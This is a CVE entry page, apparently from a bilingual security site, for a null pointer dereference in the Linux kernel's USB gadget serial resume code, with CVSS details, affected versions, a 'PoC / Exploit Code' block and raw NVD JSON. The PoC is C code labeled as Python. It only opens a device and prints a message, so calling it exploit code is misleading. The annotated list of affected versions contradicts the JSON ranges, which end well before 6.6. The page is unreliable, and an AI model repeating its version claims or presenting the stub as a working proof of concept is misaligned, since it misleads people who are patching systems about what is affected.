Security Vulnerability Report
中文
CVE-2023-53551 CVSS 5.5 MEDIUM

CVE-2023-53551

Published: 2025-10-04 16:15:50
Last Modified: 2026-03-21 00:33:45
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: usb: gadget: u_serial: Add null pointer check in gserial_resume Consider a case where gserial_disconnect has already cleared gser->ioport. And if a wakeup interrupt triggers afterwards, gserial_resume gets called, which will lead to accessing of gser->ioport and thus causing null pointer dereference.Add a null pointer check to prevent this. Added a static spinlock to prevent gser->ioport from becoming null after the newly added check.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.6(受影响稳定版本)
Linux Kernel 6.6.x(部分版本受影响)
Linux Kernel 6.1.x LTS(部分版本受影响)
Linux Kernel 5.15.x LTS(部分版本受影响)
Linux Kernel 5.10.x LTS(部分版本受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2023-53551 - Linux Kernel USB Gadget u_serial Null Pointer Dereference // This PoC demonstrates the race condition trigger concept // Note: Actual exploitation requires kernel module loading or specific USB device setup #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <sys/ioctl.h> #include <linux/usbdevice_fs.h> // Step 1: Open USB gadget serial device int open_gserial() { int fd = open("/dev/ttyGS0", O_RDWR | O_NONBLOCK); if (fd < 0) { perror("Failed to open /dev/ttyGS0"); return -1; } return fd; } // Step 2: Trigger the race condition // The actual trigger requires: // 1. Loading the g_serial kernel module // 2. Configuring USB gadget // 3. Suspending the system // 4. Disconnecting during suspend // 5. Triggering wakeup interrupt int trigger_vuln() { // This is a conceptual PoC - actual exploitation requires kernel-level access printf("Triggering CVE-2023-53551 race condition...\n"); // The vulnerability is in gserial_resume accessing gser->ioport // after gserial_disconnect has set it to NULL // Kernel-level trigger sequence: // 1. modprobe g_serial (load the vulnerable module) // 2. echo mem > /sys/power/state (suspend system) // 3. Disconnect USB device (triggers gserial_disconnect -> ioport = NULL) // 4. USB wakeup event (triggers gserial_resume -> NULL dereference) return 0; } int main() { int fd = open_gserial(); if (fd >= 0) { trigger_vuln(); close(fd); } return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53551", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:50.370", "lastModified": "2026-03-21T00:33:44.970", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: u_serial: Add null pointer check in gserial_resume\n\nConsider a case where gserial_disconnect has already cleared\ngser->ioport. And if a wakeup interrupt triggers afterwards,\ngserial_resume gets called, which will lead to accessing of\ngser->ioport and thus causing null pointer dereference.Add\na null pointer check to prevent this.\n\nAdded a static spinlock to prevent gser->ioport from becoming\nnull after the newly added check."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.8", "versionEndExcluding": "5.10.171", "matchCriteriaId": "1C6103A0-B2DA-4343-BE7F-420AD9C3E9F5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.97", "matchCriteriaId": "293EA4A4-1DE5-4552-BD15-AC8E7AA768A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.15", "matchCriteriaId": "E106F039-DB1A-42B7-B7E5-2DC9016A98AF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.2", "matchCriteriaId": "560CE063-53C3-4B4D-8FAC-615D86B8D3DB"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/3b24c980dc07be4550a9d1450ed7057f882530e5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/44e004f757a7ae13dfebaadbcfdb1a6f98c10377", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5ec63fdbca604568890c577753c6f66c5b3ef0b5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c5360eec648bd506afa304ae4a71f82e13d41897", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ec357cd3e8af614855d286dd378725cdc7264df6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.